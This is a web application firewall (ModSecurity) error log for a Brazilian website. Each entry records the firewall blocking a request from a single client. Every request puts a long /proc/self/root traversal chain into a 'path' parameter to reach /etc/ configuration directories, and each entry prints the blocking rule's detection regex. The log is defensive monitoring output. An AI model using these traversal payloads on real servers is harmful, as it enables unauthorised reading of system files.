[Tue Mar 17 08:20:15.697296 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.241.46:44076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk473RXaaWotPICgYscEwAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:17.265682 2026] [:error] [pid 662:tid 140411557287680] [client 74.7.241.46:44092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk48a60egQjobaJUYgHewAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:18.574368 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.241.46:33718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk48lKJy4A1bGlmj9BNhwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:20.195013 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:33728] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk49JqmL8PQht4WJFlAnQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:23.473140 2026] [:error] [pid 6002:tid 140411741927168] [client 74.7.241.46:33734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk49_AKZeKGvQeoFhlC8QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:26.370945 2026] [:error] [pid 5398:tid 140411574073088] [client 74.7.241.46:33748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4-gRES9pL8P-grjlf9AAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:29.199864 2026] [:error] [pid 662:tid 140411548894976] [client 74.7.241.46:33762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4_a60egQjobaJUYgHhQAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:31.937332 2026] [:error] [pid 5398:tid 140411691570944] [client 74.7.241.46:38852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4_wRES9pL8P-grjlf9gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:35.390849 2026] [:error] [pid 7000:tid 140411699963648] [client 74.7.241.46:38864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5AhePVOt35XCGZP8lnAAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:36.878967 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.241.46:38880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5BJDEJR9VXonE_-1FLAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:39.431584 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:34830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5B5DEJR9VXonE_-1FMAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:42.783727 2026] [:error] [pid 1961:tid 140411582465792] [client 74.7.241.46:34836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5CnRXaaWotPICgYscHwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:45.540722 2026] [:error] [pid 662:tid 140411674785536] [client 74.7.241.46:34838] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5DK60egQjobaJUYgHiQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:47.968772 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.46:34840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5DgeiSKl8TjouI-b6cQAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:49.339435 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.241.46:49270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5EVKJy4A1bGlmj9BNkQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:50.763351 2026] [:error] [pid 4712:tid 140411607643904] [client 74.7.241.46:49274] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5EnQLOys_ArAUsGMJSgAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:52.403162 2026] [:error] [pid 662:tid 140411649607424] [client 74.7.241.46:49278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5FK60egQjobaJUYgHjAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:53.847303 2026] [:error] [pid 5398:tid 140411691570944] [client 74.7.241.46:49286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5FQRES9pL8P-grjlgAAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:55.091431 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:49288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5F9CmCSWTlPouqorDYAAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:56.521141 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.46:49300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5GKBJNF7axNlVR0X0xgAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:20:58.931206 2026] [:error] [pid 32588:tid 140411624429312] [client 74.7.241.46:49304] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5Gi8PwvOE6ZaeZxiGQAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:00.340852 2026] [:error] [pid 5398:tid 140411649607424] [client 74.7.241.46:33336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 